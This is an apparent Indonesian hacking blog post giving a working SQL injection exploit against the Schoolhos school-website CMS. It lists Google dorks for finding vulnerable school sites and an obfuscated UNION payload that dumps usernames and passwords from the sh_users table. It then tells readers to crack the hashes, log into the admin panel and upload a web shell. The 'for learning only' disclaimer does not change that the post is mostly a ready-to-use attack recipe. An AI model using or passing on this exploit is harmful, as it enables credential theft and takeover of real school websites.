We back,
Selamat dini hari guys, kali ini Etcday akan share Exploit CMS Schoolhost. oiya sebelumnya ini exploit lama namun masih banyak website-website yang menggunakan CMS ini termasuk website Sekolahan sch.id.
Email Support Schoolhos : support@schoolhos.com
Fan Page Schoolhos : Schoolhos Facebook
Twitter Schoolhos : Schoolhos Twitter
Situs Resmi Schoolhos : Official Schoolhos
okeh langsung saja ke Proof Of Concept nya hehehh :
disni saya akan menggunakan Parameter SQL pada website tersebut.
silakan cari target dengan Dork berikut :
inurl:/?p=siswa
inurl:/?p=berita
intext:"Schoolhos Free Open Source CMS"
inurl:/?p=galeri
Dork bisa kalian kembangkan lagi biar "NTAPS".
POC :
http://victim.com/?p=detberita&id=[SQL][Payload]
Exploitnya :
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
taarrraaaa, user dan password nya sudah kita dapat, tinggal hash passwordnya di
https://hashkiller.co.uk .
silakan login
http://victim.com/adminpanel
bila sukses silakan di upload shell ke sayangan kalian.
NB: Berhubung yang kita bahas website pendidikan diharapkan tidak menebas indexnya... :)
apa yang dibahas kali ini adalah untuk pembelajaran semata.
sekian dan terimaksih wassalam.
EmoticonEmoticon